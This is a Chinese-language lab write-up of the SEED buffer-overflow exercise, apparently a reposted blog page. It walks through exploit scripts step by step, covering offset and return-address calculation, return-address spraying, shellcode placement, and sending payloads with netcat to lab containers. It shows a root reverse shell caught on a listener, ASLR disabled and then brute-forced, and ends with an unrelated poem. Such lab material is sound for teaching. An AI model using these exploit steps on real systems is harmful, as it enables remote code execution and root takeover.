SEED(2)-緩衝區溢位攻擊(Buffer-Overflow Attack)

阿新 • • 發佈：2021-06-29

1. 漏洞原理

漏洞程式碼示例：

#include<string.h>
void foo(char *str)
{
   char buffer[12];
   strcpy(buffer, str);
}
int main()
{
   char *str = "This is definitely longer than 12";
   foo(str);
   return 1;
}

當把str的內容copy到buffer中，由於str的長度大於12，就會造成緩衝區buffer的溢位，str中多出的部分會存放在緩衝區的上方，我們的目的就是將程式碼植入到此處，然後讓函式的return Address

指向我們存放程式碼的地址A來執行code！

A：code的起始地址

Nop：指令為0x90，執行該指令時什麼都不做，一直往下執行。(在code與foo()之間填滿Nop，便於找到地址A，return Address一旦指向其中一個Nop，就會執行到code的地址A)

2. 實驗準備

下載實驗所需檔案：https://wwr.lanzoui.com/iUn5vql6ine

進入到/Buffer_Overflow/Labsetup/server-code路徑下，執行：

$ make
$ make install

$ cd .. #進入/Labsetup目錄
$ dcbuild
$ dcup

關閉防範機制：memory randomization

$ sudo sysctl -w kernel.randomize_va_space=0

3. Level 1 Attack:Get the Parameters(獲取引數)

$ echo hello | nc 10.9.0.5 9090
^C

若執行兩次打印出的結果一致且輸出地址為0xffffxxxx，則說明memory randomization已關閉；

Container Console

server-1-10.9.0.5 | Got a connection from 10.9.0.1
server-1-10.9.0.5 | Starting stack
server-1-10.9.0.5 | Input size: 6
server-1-10.9.0.5 | Frame Pointer (ebp) inside bof():  0xffffd108
server-1-10.9.0.5 | Buffer's address inside bof():     0xffffd098
server-1-10.9.0.5 | ==== Returned Properly ====
server-1-10.9.0.5 | Got a connection from 10.9.0.1
server-1-10.9.0.5 | Starting stack
server-1-10.9.0.5 | Input size: 6
server-1-10.9.0.5 | Frame Pointer (ebp) inside bof():  0xffffd108
server-1-10.9.0.5 | Buffer's address inside bof():     0xffffd098
server-1-10.9.0.5 | ==== Returned Properly ====

$ cd /Buffer_Overflow/Files
$ vim exploit-L1.py

然後利用ebp 和 Buffer address 計算A的地址(ret)和offset：

ret(A) = 0xffffd108 + 8（min(A) = ebp + 8；max(A) = 517 - len(code)）

offset = 0xffffd108 - 0xffffd098 + 4 = 116(十進位制)

修改exploit-L1.py中ret和offset的值並保退出；然後執行：

$ python3 exploit-L1.py
$ cat badfile | nc 10.9.0.5 9090

Container Console

server-1-10.9.0.5 | Got a connection from 10.9.0.1
server-1-10.9.0.5 | Starting stack
server-1-10.9.0.5 | Input size: 517
server-1-10.9.0.5 | Frame Pointer (ebp) inside bof():  0xffffd428
server-1-10.9.0.5 | Buffer's address inside bof():     0xffffd3b8
server-1-10.9.0.5 | (^_^) SUCCESS SUCCESS (^_^)

若出現上面'(^_^) SUCCESS SUCCESS (^_^)'，說明成功！

Get Revere Shell

修改exploit-L1.py檔案ret和A的值：

##################################################################
# Put the shellcode at the end
content[517-len(shellcode):] = shellcode

# You need to find the correct address
# This should be the first instruction you want to return to
ret = 0xffffd428+40

# You need to calculate the offset 
offset = 116

L = 4     # Use 4 for 32-bit address and 8 for 64-bit address
content[offset:offset + L] = (ret).to_bytes(L,byteorder='little') 
##################################################################

新建一個命令列視窗輸入$ nc -lnv 7070開啟監聽

在另外一個視窗向server傳送badfile檔案

$ python3 exploit-L1.py
$ cat badfile | nc 10.9.0.5 9090

監聽視窗輸出以下內容，說明成功獲取Revere Shell；

Listening on 0.0.0.0 7070
Connection received on 10.9.0.5 51582
root@ec5152748270:/bof#

4. Level 2 Attack : Buffer Size Unknown

$ echo hello | nc 10.9.0.6 9090
^C

Container Console

server-2-10.9.0.6 | Got a connection from 10.9.0.1
server-2-10.9.0.6 | Starting stack
server-2-10.9.0.6 | Input size: 6
server-2-10.9.0.6 | Buffer's address inside bof():     0xffffd368
server-2-10.9.0.6 | ==== Returned Properly ====

修改exploit-L2.py檔案ret和S的值:

S：ref的個數 = buffersize/4(一個ref為4位元組)

ret：BufferAddress + buffersize

##################################################################
# Put the shellcode at the end of the buffer
content[517-len(shellcode):] = shellcode

# You need to find the correct address
# This should be the first instruction you want to return to
ret = 0xffffd368+360

# Spray the buffer with S number of return addresses
# You need to decide the S value
S = 90
for offset in range(S):
    content[offset*4:offset*4 + 4] = (ret).to_bytes(4,byteorder='little') 
##################################################################

$ python3 exploit-L2.py
$ cat badfile | nc 10.9.0.6 9090

Container Console

server-2-10.9.0.6 | Got a connection from 10.9.0.1
server-2-10.9.0.6 | Starting stack
server-2-10.9.0.6 | Input size: 517
server-2-10.9.0.6 | Buffer's address inside bof():     0xffffd368
server-2-10.9.0.6 | (^_^) SUCCESS SUCCESS (^_^)

5. Attack: 64-bit Server

原理：

$ echo hello | nc 10.9.0.7 9090
^C

Container Console

server-3-10.9.0.7 | Got a connection from 10.9.0.1
server-3-10.9.0.7 | Starting stack
server-3-10.9.0.7 | Input size: 517
server-3-10.9.0.7 | Frame Pointer (rbp) inside bof():  0x00007fffffffe2d0
server-3-10.9.0.7 | Buffer's address inside bof():     0x00007fffffffe200

修改exploit-L3.py檔案中的start，ret和offset；

start = 40

offset = ebp - buffer + 8

ret = [buffer，buffer + 40]範圍之間任選一個

$ python3 exploit-L3.py
$ cat badfile | nc 10.9.0.7 9090

Container Console

server-3-10.9.0.7 | Got a connection from 10.9.0.1
server-3-10.9.0.7 | Starting stack
server-3-10.9.0.7 | Input size: 517
server-3-10.9.0.7 | Frame Pointer (rbp) inside bof():  0x00007fffffffe2d0
server-3-10.9.0.7 | Buffer's address inside bof():     0x00007fffffffe200
server-3-10.9.0.7 | (^_^) SUCCESS SUCCESS (^_^)

6. Level 4 Attack: Small Buffer(64-bit)

$ echo hello | nc 10.9.0.8 9090
^C

Container Console

server-4-10.9.0.8 | Got a connection from 10.9.0.1
server-4-10.9.0.8 | Starting stack
server-4-10.9.0.8 | Input size: 6
server-4-10.9.0.8 | Frame Pointer (rbp) inside bof():  0x00007fffffffe2b0
server-4-10.9.0.8 | Buffer's address inside bof():     0x00007fffffffe250
server-4-10.9.0.8 | ==== Returned Properly ====

修改exploit-L4.py檔案

ret = rbp + 1200

$ python3 exploit-L4.py
$ cat badfile | nc 10.9.0.8 9090

Container Console

server-4-10.9.0.8 | Got a connection from 10.9.0.1
server-4-10.9.0.8 | Starting stack
server-4-10.9.0.8 | Input size: 517
server-4-10.9.0.8 | Frame Pointer (rbp) inside bof():  0x00007fffffffe2b0
server-4-10.9.0.8 | Buffer's address inside bof():     0x00007fffffffe250
server-4-10.9.0.8 | (^_^) SUCCESS SUCCESS (^_^)

開啟防範機制

$ sudo sysctl -w kernel.randomize_va_space=2

執行$ nc -lnv 7070開啟監聽

Listening on 0.0.0.0 7070

修改exploit為reverse shell

新建一個命令列視窗：

$ python3 exploit-L1.py
$ chmod u+x brute-force.sh
$ ./brute-force.sh

我這裡總共用時8分12秒：

8 minutes and 12 seconds elapsed.
The program has been running 27296 times so far.
8 minutes and 12 seconds elapsed.
The program has been running 27297 times so far.

成功後監聽視窗會返回shell

Connection received on 10.9.0.5 51372
root@ec5152748270:/bof#

  《從前慢》
記得早先少年時
大家誠誠懇懇
說一句 是一句
清早上火車站
長街黑暗無行人
賣豆漿的小店冒著熱氣
從前的日色變得慢
車，馬，郵件都慢
一生只夠愛一個人
從前的鎖也好看
鑰匙精美有樣子
你鎖了 人家就懂了

SEED(2)-緩衝區溢位攻擊(Buffer-Overflow Attack)

1. 漏洞原理漏洞程式碼示例： #include<string.h> void foo(char *str) { char buffer[12]; strcpy(buffer, str);

資訊保安技術實用教程-第4版---張同光---ISBN-9787121423031---5.4.2例項——緩衝區溢位攻擊WindowsXPSP3

資訊保安技術實用教程-第4版---張同光---ISBN-9787121423031---5.4.2例項——緩衝區溢位攻擊WindowsXPSP3https://www.cnblogs.com/ztguang/p/12828764.html主編：張同光ISBN號： 978-7-121-42303-1 9787121423031